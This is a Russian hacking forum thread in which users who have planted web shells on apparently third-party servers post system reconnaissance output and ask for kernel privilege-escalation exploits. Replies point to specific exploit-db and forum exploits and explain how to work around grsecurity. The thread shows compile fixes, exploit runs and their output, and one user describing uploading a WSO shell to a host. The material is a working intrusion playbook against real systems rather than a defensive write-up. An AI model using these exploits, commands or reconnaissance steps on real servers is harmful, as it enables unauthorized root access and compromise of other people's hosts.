3.пробовал, вывод, как у большинства эксплоитов :

как при подключении-

sh:no job control in this shell

4. точно не помню, а врать не буду

по моему: 3 - ребут, 4 - просак....

Цитата:

Сообщение от None
Сообщение от sevenup www.1337day.com/exploits/17022 И будет тебе счастье

тоже:

sh:no job control in this shell

Expl0ited 08.10.2011 00:31

Цитата:

Сообщение от Sidarovich1975
Sidarovich1975 said:
1.ping6 - тот же вывод...
2.Естессссно, даже несколько раз вводил id
3.пробовал, вывод, как у большинства эксплоитов :
как при подключении-
sh:no job control in this shell
4. точно не помню, а врать не буду
по моему: 3 - ребут, 4 - просак....
тоже:
sh:no job control in this shell

а ты после сообщения no job control in this shell пробовал вывести команду id или whoami?

Sidarovich1975 08.10.2011 00:54

Цитата:

Сообщение от Expl0ited
Expl0ited said:
а ты после сообщения
no job control in this shell
пробовал вывести команду id или whoami?

иногда наченаешь чувствовать себя идиотом, ведь проверил "на всякий случай"!

немного офтоп, прошу прощения....

ZARO 08.10.2011 13:52

Цитата:

Сообщение от Tigger
Tigger said:
По поводу первого сплоита вот прочитай: https://rdot.org/forum/showthread.php?t=820
Там в посте
#9
можно скачать уже скопиленный сплоит, попробуй.
И в посте
#6
указано как изменить сплоит, чтобы компилировался. Попробуй оба варианта.
По поводу крона:
А владелец файла, случайно так, не тот юзер под которым ты?
Хотя вероятность крайне мала
У тебя ядро просто ноябрь 2010г, это считай 2011г, тут мало шансов чем-то ядерным пробить.

Пишет ошибкуCould not open socket

er9j6@ 10.10.2011 19:54

Погуглил, ничего не нашел, под это что-нибудь есть?

Код:

Code:
/usr/bin/gcc
/usr/bin/c++
/bin/netstat

$ uname -a
Linux 2.6.32-32-generic-pae #62-Ubuntu SMP Wed Apr 20 22:10:33 UTC 2011 i686 GNU/Linux

$ ls -la /boot
total 45355
drwxr-xr-x  4 root root    1024 Jun 21 09:39 .
drwxr-xr-x 22 root root    4096 Oct 10 08:34 ..
-rw-r--r--  1 root root 1728514 Apr 16  2010 System.map-2.6.32-21-generic-pae
-rw-r--r--  1 root root 1728514 Jun  4  2010 System.map-2.6.32-22-generic-pae
-rw-r--r--  1 root root 1731605 Apr 21 07:03 System.map-2.6.32-32-generic-pae
-rw-r--r--  1 root root  643984 Apr 16  2010 abi-2.6.32-21-generic-pae
-rw-r--r--  1 root root  643984 Jun  4  2010 abi-2.6.32-22-generic-pae
-rw-r--r--  1 root root  655506 Apr 21 07:03 abi-2.6.32-32-generic-pae
-rw-r--r--  1 root root  116302 Apr 16  2010 config-2.6.32-21-generic-pae
-rw-r--r--  1 root root  116302 Jun  4  2010 config-2.6.32-22-generic-pae
-rw-r--r--  1 root root  116480 Apr 21 07:03 config-2.6.32-32-generic-pae
drwxr-xr-x  3 root root    4096 Jun 21 09:28 grub
-rw-r--r--  1 root root 8691398 Jun 10  2010 initrd.img-2.6.32-21-generic-pae
-rw-r--r--  1 root root 8690603 Jun 21 09:21 initrd.img-2.6.32-22-generic-pae
-rw-r--r--  1 root root 8695474 Jun 21 09:39 initrd.img-2.6.32-32-generic-pae
drwxr-xr-x  2 root root  12288 Jun 10  2010 lost+found
-rw-r--r--  1 root root  160280 Mar 23  2010 memtest86+.bin
-rw-r--r--  1 root root    1200 Apr 16  2010 vmcoreinfo-2.6.32-21-generic-pae
-rw-r--r--  1 root root    1200 Jun  4  2010 vmcoreinfo-2.6.32-22-generic-pae
-rw-r--r--  1 root root    1200 Apr 21 07:05 vmcoreinfo-2.6.32-32-generic-pae
-rw-r--r--  1 root root 4159008 Apr 16  2010 vmlinuz-2.6.32-21-generic-pae
-rw-r--r--  1 root root 4158816 Jun  4  2010 vmlinuz-2.6.32-22-generic-pae
-rw-r--r--  1 root root 4170240 Apr 21 07:03 vmlinuz-2.6.32-32-generic-pae

$ ls -la --full-time /lib/libc*
-rwxr-xr-x 1 root root 1335560 2011-01-22 07:53:26.000000000 +0800 /lib/libc-2.11.1.so
lrwxrwxrwx 1 root root      14 2011-06-21 09:16:16.371396105 +0800 /lib/libc.so.6 -> libc-2.11.1.so
lrwxrwxrwx 1 root root      14 2010-06-10 18:27:14.602424031 +0800 /lib/libcap.so.2 -> libcap.so.2.17
-rw-r--r-- 1 root root  13852 2010-03-09 05:42:43.000000000 +0800 /lib/libcap.so.2.17
-rw-r--r-- 1 root root  181780 2011-01-22 07:53:26.000000000 +0800 /lib/libcidn-2.11.1.so
lrwxrwxrwx 1 root root      17 2011-06-21 09:16:16.371396105 +0800 /lib/libcidn.so.1 -> libcidn-2.11.1.so
lrwxrwxrwx 1 root root      17 2011-06-21 09:16:28.513896196 +0800 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root    9636 2010-08-17 14:29:47.000000000 +0800 /lib/libcom_err.so.2.1
-rw-r--r-- 1 root root  38360 2011-01-22 07:53:26.000000000 +0800 /lib/libcrypt-2.11.1.so
lrwxrwxrwx 1 root root      18 2011-06-21 09:16:16.371396105 +0800 /lib/libcrypt.so.1 -> libcrypt-2.11.1.so
-rw-r--r-- 1 root root 1372860 2011-02-10 10:24:31.000000000 +0800 /lib/libcrypto.so.0.9.8

$ mount
/dev/mapper/tfdubuntu-root on / type ext4 (rw,errors=remount-ro)
proc on /proc type proc (rw,noexec,nosuid,nodev)
none on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
none on /dev type devtmpfs (rw,mode=0755)
none on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
none on /dev/shm type tmpfs (rw,nosuid,nodev)
none on /var/run type tmpfs (rw,nosuid,mode=0755)
none on /var/lock type tmpfs (rw,noexec,nosuid,nodev)
none on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
/dev/sda1 on /boot type ext2 (rw)

$ df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/mapper/tfdubuntu-root
                      449G  95G  332G  23% /
none                  2.0G  256K  2.0G  1% /dev
none                  2.0G    0  2.0G  0% /dev/shm
none                  2.0G  100K  2.0G  1% /var/run
none                  2.0G    0  2.0G  0% /var/lock
none                  2.0G    0  2.0G  0% /lib/init/rw
/dev/sda1            228M  46M  171M  22% /boot

$ cat /etc/issue
Ubuntu 10.04.2 LTS \n \l

$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user        command
17 *        * * *        root    cd / && run-parts --report /etc/cron.hourly
25 6        * * *        root        test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6        * * 7        root        test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6        1 * *        root        test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

$ cat /proc/version
Linux version 2.6.32-32-generic-pae (buildd@roseapple) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) ) #62-Ubuntu SMP Wed Apr 20 22:10:33 UTC 2011

$ cat /proc/sys/vm/mmap_min_addr
65536

$ pwd
/home/www/thedoctor/public_html/logs


Expl0ited 10.10.2011 19:58

er9j6@, Apr 20 22:10:33 UTC 2011 ничем не пробить пока что.

zenon3 11.10.2011 08:10

$ uname -a

Linux line6 2.6.32.8-grsec-2.1.14-modsign-xeon-64 #2 SMP Sat Mar 13 00:42:43 PST 2010 x86_64 GNU/Linux

$ ls -la /boot

total 32908

drwxr-xr-x 3 root root 4096 Oct 2 05:11 .

drwxr-xr-x 25 root root 4096 Sep 17 23:34 ..

-rw-r--r-- 1 root root 1225451 Mar 13 2009 System.map-2.6.26-1-amd64

-rw-r--r-- 1 root root 1227280 Sep 20 23:04 System.map-2.6.26-2-amd64

-rw-r--r-- 1 root root 85588 Mar 13 2009 config-2.6.26-1-amd64

-rw-r--r-- 1 root root 85694 Sep 20 23:04 config-2.6.26-2-amd64

drwxr-xr-x 2 root root 4096 Oct 2 05:11 grub

-rw-r--r-- 1 root root 6928695 Apr 29 2010 initrd.img-2.6.26-1-amd64

-rw-r--r-- 1 root root 6651999 Mar 5 2009 initrd.img-2.6.26-1-amd64.bak

-rw-r--r-- 1 root root 6941167 Oct 2 05:11 initrd.img-2.6.26-2-amd64

-rw-r--r-- 1 root root 6936102 Apr 29 2010 initrd.img-2.6.26-2-amd64.bak

-rw-r--r-- 1 root root 1755120 Mar 13 2009 vmlinuz-2.6.26-1-amd64

-rw-r--r-- 1 root root 1756944 Sep 20 23:02 vmlinuz-2.6.26-2-amd64\

$ ls -la --full-time /lib/lib*

-rw-r--r-- 1 root root 6176 2011-01-07 13:33:04.000000000 -0800 /lib/libBrokenLocale-2.7.so

lrwxrwxrwx 1 root root 22 2011-01-12 02:19:38.000000000 -0800 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.7.so

-rw-r--r-- 1 root root 18600 2011-01-07 13:33:04.000000000 -0800 /lib/libSegFault.so

lrwxrwxrwx 1 root root 15 2010-06-03 09:54:24.000000000 -0700 /lib/libacl.so.1 -> libacl.so.1.1.0

-rw-r--r-- 1 root root 29360 2008-04-23 14:01:34.000000000 -0700 /lib/libacl.so.1.1.0

-rw-r--r-- 1 root root 14832 2011-01-07 13:33:04.000000000 -0800 /lib/libanl-2.7.so

lrwxrwxrwx 1 root root 13 2011-01-12 02:19:38.000000000 -0800 /lib/libanl.so.1 -> libanl-2.7.so

lrwxrwxrwx 1 root root 16 2010-06-03 09:54:24.000000000 -0700 /lib/libattr.so.1 -> libattr.so.1.1.0

-rw-r--r-- 1 root root 17424 2009-02-10 01:47:21.000000000 -0800 /lib/libattr.so.1.1.0

lrwxrwxrwx 1 root root 15 2010-06-03 09:54:24.000000000 -0700 /lib/libblkid.so.1 -> libblkid.so.1.0

-rw-r--r-- 1 root root 46608 2008-10-12 20:54:02.000000000 -0700 /lib/libblkid.so.1.0

lrwxrwxrwx 1 root root 15 2010-09-21 03:02:04.000000000 -0700 /lib/libbz2.so.1 -> libbz2.so.1.0.4

lrwxrwxrwx 1 root root 15 2010-09-21 03:02:04.000000000 -0700 /lib/libbz2.so.1.0 -> libbz2.so.1.0.4

-rw-r--r-- 1 root root 66224 2010-08-18 10:44:47.000000000 -0700 /lib/libbz2.so.1.0.4

-rwxr-xr-x 1 root root 1375536 2011-01-07 13:33:04.000000000 -0800 /lib/libc-2.7.so

lrwxrwxrwx 1 root root 11 2011-01-12 02:19:38.000000000 -0800 /lib/libc.so.6 -> libc-2.7.so

lrwxrwxrwx 1 root root 14 2010-06-03 09:54:24.000000000 -0700 /lib/libcap.so.1 -> libcap.so.1.10

-rw-r--r-- 1 root root 14880 2006-03-16 03:56:29.000000000 -0800 /lib/libcap.so.1.10

lrwxrwxrwx 1 root root 14 2010-06-03 09:54:24.000000000 -0700 /lib/libcap.so.2 -> libcap.so.2.11

-rw-r--r-- 1 root root 16976 2008-07-26 08:52:16.000000000 -0700 /lib/libcap.so.2.11

lrwxrwxrwx 1 root root 17 2010-06-03 09:54:24.000000000 -0700 /lib/libcfont.so.0 -> libcfont.so.0.0.0

-rw-r--r-- 1 root root 12776 2008-04-15 14:40:42.000000000 -0700 /lib/libcfont.so.0.0.0

-rw-r--r-- 1 root root 190760 2011-01-07 13:33:04.000000000 -0800 /lib/libcidn-2.7.so

lrwxrwxrwx 1 root root 14 2011-01-12 02:19:38.000000000 -0800 /lib/libcidn.so.1 -> libcidn-2.7.so

lrwxrwxrwx 1 root root 17 2010-06-03 09:54:24.000000000 -0700 /lib/libcom_err.so.2 -> libcom_err.so.2.1

-rw-r--r-- 1 root root 11648 2008-10-12 20:54:02.000000000 -0700 /lib/libcom_err.so.2.1

lrwxrwxrwx 1 root root 19 2010-06-03 09:54:24.000000000 -0700 /lib/libconsole.so.0 -> libconsole.so.0.0.0

-rw-r--r-- 1 root root 140840 2008-04-15 14:40:42.000000000 -0700 /lib/libconsole.so.0.0.0

-rw-r--r-- 1 root root 39112 2011-01-07 13:33:04.000000000 -0800 /lib/libcrypt-2.7.so

lrwxrwxrwx 1 root root 15 2011-01-12 02:19:38.000000000 -0800 /lib/libcrypt.so.1 -> libcrypt-2.7.so

lrwxrwxrwx 1 root root 19 2010-06-03 09:54:24.000000000 -0700 /lib/libctutils.so.0 -> libctutils.so.0.0.0

-rw-r--r-- 1 root root 21024 2008-04-15 14:40:42.000000000 -0700 /lib/libctutils.so.0.0.0

-rw-r--r-- 1 root root 98840 2008-10-01 07:33:16.000000000 -0700 /lib/libdevmapper.so.1.02.1

-rw-r--r-- 1 root root 14616 2011-01-07 13:33:04.000000000 -0800 /lib/libdl-2.7.so

lrwxrwxrwx 1 root root 12 2011-01-12 02:19:38.000000000 -0800 /lib/libdl.so.2 -> libdl-2.7.so

lrwxrwxrwx 1 root root 13 2010-06-03 09:54:24.000000000 -0700 /lib/libe2p.so.2 -> libe2p.so.2.3

-rw-r--r-- 1 root root 25424 2008-10-12 20:54:02.000000000 -0700 /lib/libe2p.so.2.3

lrwxrwxrwx 1 root root 16 2010-06-03 09:54:24.000000000 -0700 /lib/libext2fs.so.2 -> libext2fs.so.2.4

-rw-r--r-- 1 root root 187416 2008-10-12 20:54:02.000000000 -0700 /lib/libext2fs.so.2.4

-rw-r--r-- 1 root root 93016 2009-01-02 03:14:18.000000000 -0800 /lib/libgcc_s.so.1

lrwxrwxrwx 1 root root 17 2010-06-03 09:54:24.000000000 -0700 /lib/libhistory.so.5 -> libhistory.so.5.2

-rw-r--r-- 1 root root 32968 2009-01-14 03:19:12.000000000 -0800 /lib/libhistory.so.5.2

-rw-r--r-- 1 root root 32016 2008-07-12 15:07:47.000000000 -0700 /lib/libiw.so.29

-rw-r--r-- 1 root root 7736 2008-09-01 04:59:38.000000000 -0700 /lib/libkeyutils-1.2.so

lrwxrwxrwx 1 root root 18 2010-06-03 09:54:24.000000000 -0700 /lib/libkeyutils.so.1 -> libkeyutils-1.2.so

-rw-r--r-- 1 root root 534736 2011-01-07 13:33:04.000000000 -0800 /lib/libm-2.7.so

lrwxrwxrwx 1 root root 11 2011-01-12 02:19:38.000000000 -0800 /lib/libm.so.6 -> libm-2.7.so

-rw-r--r-- 1 root root 18592 2011-01-07 13:33:04.000000000 -0800 /lib/libmemusage.so

lrwxrwxrwx 1 root root 17 2010-06-03 09:54:24.000000000 -0700 /lib/libncurses.so.5 -> libncurses.so.5.7

-rw-r--r-- 1 root root 256288 2008-12-14 13:31:27.000000000 -0800 /lib/libncurses.so.5.7

lrwxrwxrwx 1 root root 18 2010-06-03 09:54:24.000000000 -0700 /lib/libncursesw.so.5 -> libncursesw.so.5.7

-rw-r--r-- 1 root root 305952 2008-12-14 13:31:28.000000000 -0800 /lib/libncursesw.so.5.7

-rw-r--r-- 1 root root 88968 2011-01-07 13:33:04.000000000 -0800 /lib/libnsl-2.7.so

lrwxrwxrwx 1 root root 13 2011-01-12 02:19:38.000000000 -0800 /lib/libnsl.so.1 -> libnsl-2.7.so

-rw-r--r-- 1 root root 31536 2011-01-07 13:33:04.000000000 -0800 /lib/libnss_compat-2.7.so

lrwxrwxrwx 1 root root 20 2011-01-12 02:19:38.000000000 -0800 /lib/libnss_compat.so.2 -> libnss_compat-2.7.so

-rw-r--r-- 1 root root 18752 2011-01-07 13:33:04.000000000 -0800 /lib/libnss_dns-2.7.so

lrwxrwxrwx 1 root root 17 2011-01-12 02:19:38.000000000 -0800 /lib/libnss_dns.so.2 -> libnss_dns-2.7.so

-rw-r--r-- 1 root root 47520 2011-01-07 13:33:04.000000000 -0800 /lib/libnss_files-2.7.so

lrwxrwxrwx 1 root root 19 2011-01-12 02:19:38.000000000 -0800 /lib/libnss_files.so.2 -> libnss_files-2.7.so

-rw-r--r-- 1 root root 18784 2011-01-07 13:33:04.000000000 -0800 /lib/libnss_hesiod-2.7.so

lrwxrwxrwx 1 root root 20 2011-01-12 02:19:38.000000000 -0800 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.7.so

-rw-r--r-- 1 root root 43472 2011-01-07 13:33:04.000000000 -0800 /lib/libnss_nis-2.7.so

lrwxrwxrwx 1 root root 17 2011-01-12 02:19:38.000000000 -0800 /lib/libnss_nis.so.2 -> libnss_nis-2.7.so

-rw-r--r-- 1 root root 51616 2011-01-07 13:33:04.000000000 -0800 /lib/libnss_nisplus-2.7.so

lrwxrwxrwx 1 root root 21 2011-01-12 02:19:38.000000000 -0800 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.7.so

lrwxrwxrwx 1 root root 17 2010-06-03 09:54:24.000000000 -0700 /lib/libpam.so.0 -> libpam.so.0.81.12

-rw-r--r-- 1 root root 46256 2009-03-24 02:08:13.000000000 -0700 /lib/libpam.so.0.81.12

lrwxrwxrwx 1 root root 21 2010-06-03 09:54:24.000000000 -0700 /lib/libpam_misc.so.0 -> libpam_misc.so.0.81.3

-rw-r--r-- 1 root root 10920 2009-03-24 02:08:13.000000000 -0700 /lib/libpam_misc.so.0.81.3

lrwxrwxrwx 1 root root 17 2010-06-03 09:54:24.000000000 -0700 /lib/libpamc.so.0 -> libpamc.so.0.81.0

-rw-r--r-- 1 root root 11464 2009-03-24 02:08:13.000000000 -0700 /lib/libpamc.so.0.81.0

lrwxrwxrwx 1 root root 23 2010-06-03 09:54:24.000000000 -0700 /lib/libparted-1.8.so.10 -> libparted-1.8.so.10.0.0

-rw-r--r-- 1 root root 389040 2008-11-23 18:28:09.000000000 -0800 /lib/libparted-1.8.so.10.0.0

-rw-r--r-- 1 root root 6192 2011-01-07 13:33:04.000000000 -0800 /lib/libpcprofile.so

lrwxrwxrwx 1 root root 16 2010-06-03 09:54:24.000000000 -0700 /lib/libpopt.so.0 -> libpopt.so.0.0.0

-rw-r--r-- 1 root root 37712 2008-06-25 04:06:15.000000000 -0700 /lib/libpopt.so.0.0.0

-rw-r--r-- 1 root root 68064 2009-01-11 14:08:40.000000000 -0800 /lib/libproc-3.2.7.so

-rwxr-xr-x 1 root root 130114 2011-01-07 13:33:04.000000000 -0800 /lib/libpthread-2.7.so

lrwxrwxrwx 1 root root 17 2011-01-12 02:19:38.000000000 -0800 /lib/libpthread.so.0 -> libpthread-2.7.so

lrwxrwxrwx 1 root root 18 2010-06-03 09:54:24.000000000 -0700 /lib/libreadline.so.5 -> libreadline.so.5.2

-rw-r--r-- 1 root root 258616 2009-01-14 03:19:12.000000000 -0800 /lib/libreadline.so.5.2

-rw-r--r-- 1 root root 72568 2011-01-07 13:33:04.000000000 -0800 /lib/libresolv-2.7.so

lrwxrwxrwx 1 root root 16 2011-01-12 02:19:38.000000000 -0800 /lib/libresolv.so.2 -> libresolv-2.7.so

-rw-r--r-- 1 root root 35784 2011-01-07 13:33:04.000000000 -0800 /lib/librt-2.7.so

lrwxrwxrwx 1 root root 12 2011-01-12 02:19:38.000000000 -0800 /lib/librt.so.1 -> librt-2.7.so

-rw-r--r-- 1 root root 109464 2008-09-16 00:22:47.000000000 -0700 /lib/libselinux.so.1

-rw-r--r-- 1 root root 187136 2009-01-05 15:06:30.000000000 -0800 /lib/libsemanage.so.1

-rw-r--r-- 1 root root 237168 2008-07-12 07:29:13.000000000 -0700 /lib/libsepol.so.1

lrwxrwxrwx 1 root root 17 2010-06-03 09:54:24.000000000 -0700 /lib/libslang.so.2 -> libslang.so.2.1.3

-rw-r--r-- 1 root root 952736 2008-03-17 12:22:37.000000000 -0700 /lib/libslang.so.2.1.3

lrwxrwxrwx 1 root root 12 2010-06-03 09:54:24.000000000 -0700 /lib/libss.so.2 -> libss.so.2.0

-rw-r--r-- 1 root root 24416 2008-10-12 20:54:02.000000000 -0700 /lib/libss.so.2.0

lrwxrwxrwx 1 root root 17 2010-06-03 09:54:24.000000000 -0700 /lib/libsysfs.so.2 -> libsysfs.so.2.0.1

-rw-r--r-- 1 root root 43920 2008-09-06 02:26:29.000000000 -0700 /lib/libsysfs.so.2.0.1

-rw-r--r-- 1 root root 31376 2011-01-07 13:33:04.000000000 -0800 /lib/libthread_db-1.0.so

lrwxrwxrwx 1 root root 19 2011-01-12 02:19:38.000000000 -0800 /lib/libthread_db.so.1 -> libthread_db-1.0.so

lrwxrwxrwx 1 root root 13 2010-06-03 09:54:24.000000000 -0700 /lib/libtic.so.5 -> libtic.so.5.7

-rw-r--r-- 1 root root 77328 2008-12-14 13:31:27.000000000 -0800 /lib/libtic.so.5.7

lrwxrwxrwx 1 root root 14 2010-06-03 09:54:24.000000000 -0700 /lib/libticw.so.5 -> libticw.so.5.7

-rw-r--r-- 1 root root 77328 2008-12-14 13:31:28.000000000 -0800 /lib/libticw.so.5.7

lrwxrwxrwx 1 root root 19 2010-06-03 09:54:24.000000000 -0700 /lib/libusb-0.1.so.4 -> libusb-0.1.so.4.4.4

-rw-r--r-- 1 root root 32608 2008-09-05 03:18:53.000000000 -0700 /lib/libusb-0.1.so.4.4.4

-rw-r--r-- 1 root root 10560 2011-01-07 13:33:04.000000000 -0800 /lib/libutil-2.7.so

lrwxrwxrwx 1 root root 14 2011-01-12 02:19:38.000000000 -0800 /lib/libutil.so.1 -> libutil-2.7.so

lrwxrwxrwx 1 root root 14 2010-06-03 09:54:24.000000000 -0700 /lib/libuuid.so.1 -> libuuid.so.1.2

-rw-r--r-- 1 root root 15344 2008-10-12 20:54:02.000000000 -0700 /lib/libuuid.so.1.2

lrwxrwxrwx 1 root root 22 2010-06-03 09:54:24.000000000 -0700 /lib/libvolume_id.so.0 -> libvolume_id.so.0.85.0

-rw-r--r-- 1 root root 33368 2009-08-26 03:27:16.000000000 -0700 /lib/libvolume_id.so.0.85.0

lrwxrwxrwx 1 root root 16 2010-06-03 09:54:24.000000000 -0700 /lib/libwrap.so.0 -> libwrap.so.0.7.6

-rw-r--r-- 1 root root 36208 2008-07-25 17:05:10.000000000 -0700 /lib/libwrap.so.0.7.6

-rw-r--r-- 1 root root 137000 2008-06-26 08:51:57.000000000 -0700 /lib/libx86.so.1

lrwxrwxrwx 1 root root 19 2010-06-03 09:54:24.000000000 -0700 /lib/libxtables.so.0 -> libxtables.so.0.0.0

-rw-r--r-- 1 root root 23392 2009-02-09 11:35:51.000000000 -0800 /lib/libxtables.so.0.0.0

$ mount

/dev/sda1 on / type ext3 (rw,errors=remount-ro)

tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)

proc on /proc type proc (rw,noexec,nosuid,nodev)

sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)

tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)

devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)

/dev/sda2 on /tmp type ext3 (rw,noexec,noatime,nodiratime,data=ordered,commit= 300)

/dev/sdb1 on /home type ext3 (rw,nosuid,nodev,noatime,nodiratime,errors=remount-ro,data=ordered)

$ df -h

Filesystem Size Used Avail Use% Mounted on

/dev/sda1 28G 12G 15G 46% /

tmpfs 7.9G 0 7.9G 0% /lib/init/rw

tmpfs 7.9G 0 7.9G 0% /dev/shm

/dev/sda2 7.4G 339M 6.7G 5% /tmp

/dev/sdb1 3.6T 2.9T 720G 80% /home

$ cat /etc/issue

Debian GNU/Linux 5.0 \n \l

$ cat /etc/crontab

# /etc/crontab: system-wide crontab

# Unlike any other crontab you don't have to run the `crontab'

# command to install the new version when you edit this file

# and files in /etc/cron.d. These files also have username fields,

# that none of the other crontabs do.

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command

17 * * * * root cd / && run-parts --report /etc/cron.hourly

25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )

47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )

52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

#

$ cat /proc/version

Linux version 2.6.32.8-grsec-2.1.14-modsign-xeon-64 (root@womb) (gcc version 4.3.2 (Debian 4.3.2-1.1) ) #2 SMP Sat Mar 13 00:42:43 PST 2010

sh-3.2$ cat /proc/sys/vm/mmap_min_addr

cat: /proc/sys/vm/mmap_min_addr: Operation not permitted

Пробовал enlightenment. Вот что получается:

sh-3.2$ ./run_null_exploits.sh

Compiling exp_cheddarbay.c...OK.

Compiling exp_ingom0wnar.c...OK.

Compiling exp_moosecox.c...OK.

Compiling exp_paokara.c...OK.

Compiling exp_powerglove.c...OK.

Compiling exp_sieve.c...OK.

Compiling exp_therebel.c...OK.

Compiling exp_vmware.c...failed.

Compiling exp_wunderbar.c...OK.

UNABLE TO MAP ZERO PAGE!

Прошу помощи

Tigger 11.10.2011 09:11

zenon3

RDS: http://www.vsecurity.com/download/tools/linux-rds-exploit.c

robert_you_suck: http://www.exploit-db.com/exploits/15023/

В принципе такое должно еще биться Ac1dB1tCh3z, но SynQ писал что Debian он не пробивает, т.ч. попробуй еще его модифицированный сплоит: https://rdot.org/forum/showthread.php?t=1597

Но все может обломаться из-за grsec, но не всегда он работает как надо. Если во всех сплоитах будут ошибки по типу что не смог получить символы, то grsec работает.

UPD:

Судя по этому листингу:

Код:

Code:
sh-3.2$ cat /proc/sys/vm/mmap_min_addr
 cat: /proc/sys/vm/mmap_min_addr: Operation not permitted

- grsec у тебя работает как раз таки нормально, ограничивая доступ к /proc.

Можно еще взять символы с /boot/System.map*, но запуская enlightenment на серваке 2010г, думаю что этот способ - не для тебя.

sevenup 11.10.2011 12:31

Ну из-за grsec можно даже не смотреть в сторону асидбитчес....

zenon3

Тут как вариант могут прокатить роберт ю сак или фул нельсон

hakm 11.10.2011 15:41

Помогите разобраться нубу.

Пользовался данной темой - (/thread151993.html)

Вот залил я шелл (wso 2.5 modified) на хост, посмотрел -uname - FreeBSD 6.4-RELEASE, скачал данный эксплоит http://www.exploit-db.com/exploits/16951/ ,

у меня не выделенный ip - значит использую - промежуточный хост - вопрос - что такое промежуточный хост - это то-есть второй компьютер?

Второй вопрос - через что запускать эксплоит?

zenon3 11.10.2011 20:32

Цитата:

Сообщение от sevenup
sevenup said:
Ну из-за grsec можно даже не смотреть в сторону асидбитчес....
zenon3
Тут как вариант могут прокатить роберт ю сак или фул нельсон

фулл нельсон не прокатил. роберт написал вот так:

sh-3.2$ ./rob

symbol table not available, aborting!

Process finished

zenon3 11.10.2011 20:36

Цитата:

Сообщение от Tigger
Tigger said:
zenon3
RDS: http://www.vsecurity.com/download/tools/linux-rds-exploit.c
robert_you_suck: http://www.exploit-db.com/exploits/15023/
В принципе такое должно еще биться Ac1dB1tCh3z, но SynQ писал что Debian он не пробивает, т.ч. попробуй еще его модифицированный сплоит: https://rdot.org/forum/showthread.php?t=1597
Но все может обломаться из-за grsec, но не всегда он работает как надо. Если во всех сплоитах будут ошибки по типу что не смог получить символы, то grsec работает.
UPD:
Судя по этому листингу:
Код:

Code:
sh-3.2$ cat /proc/sys/vm/mmap_min_addr
 cat: /proc/sys/vm/mmap_min_addr: Operation not permitted

- grsec у тебя работает как раз таки нормально, ограничивая доступ к /proc.
Можно еще взять символы с /boot/System.map*, но запуская enlightenment на серваке 2010г, думаю что этот способ - не для тебя.

RDS даже не скомпилировался. Написал:

sh-3.2$ gcc rds.c -o rds

rds.c: In function 'prep_sock':

rds.c:53: error: 'PF_RDS' undeclared (first use in this function)

rds.c:53: error: (Each undeclared identifier is reported only once

rds.c:53: error: for each function it appears in.)

Погуглил и нажел что надо прописать в исходник: #define AF_RDS 21

#define PF_RDS AF_RDS

Скомпилировал. Запустил:

sh-3.2$ ./rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Could not open socket.

sh-3.2$ Could not open socket

Получается RDS тоже не пробивает.

Ну так объясни пожалуйста что это за способ и почему он не для меня ? Посмотри PM.

Tigger 12.10.2011 02:29

zenon3

То о чем я и говорил. Сплоитам нужны символы из файла /proc/kallsyms. grsec ограничивает доступ к директории /proc (не всегда правда), сплоиты не могут получить символы для дальнейшей эксплуатации, поэтому и выводят такое.

А RDS у тебя просто не установлен на тачке.

zenon3 13.10.2011 19:26

Вот интересно кто все время подтирает мой пост в котором я пишу что я скинул шелл в ПМ тайгеру ? он явно не читает личные сообщения поэтому я написал тут.

vasykas 15.10.2011 01:48

2.6.32

uname -a

Linux apache 2.6.32-vs2.3.0.36.27-smp #2 SMP Sat Mar 27 19:11:22 CET 2010 i686

$ ls -la --full-time /lib/libc*

-rwxr-xr-x 1 root root 1570593 2008-11-21 08:33:31.000000000 +0100 /lib/libc-2.7.so

lrwxrwxrwx 1 root root 11 2009-12-24 11:41:48.000000000 +0100 /lib/libc.so.6 -> libc-2.7.so

-rwxr-xr-x 1 root root 190689 2008-11-21 08:33:31.000000000 +0100 /lib/libcidn-2.7.so

lrwxrwxrwx 1 root root 14 2009-12-24 11:41:47.000000000 +0100 /lib/libcidn.so.1 -> libcidn-2.7.so

lrwxrwxrwx 1 root root 17 2009-12-24 11:41:47.000000000 +0100 /lib/libcom_err.so.2 -> libcom_err.so.2.1

-rwxr-xr-x 1 root root 5744 2007-01-25 05:25:50.000000000 +0100 /lib/libcom_err.so.2.1

-rwxr-xr-x 1 root root 42592 2008-11-21 08:33:31.000000000 +0100 /lib/libcrypt-2.7.so

lrwxrwxrwx 1 root root 15 2009-12-24 11:41:48.000000000 +0100 /lib/libcrypt.so.1 -> libcrypt-2.7.so

$ mount

/dev/hdv1 on / type ufs (defaults)

none on /proc type proc (defaults)

none on /tmp type tmpfs (size=400m,mode=1777)

none on /dev/pts type devpts (gid=5,mode=620)

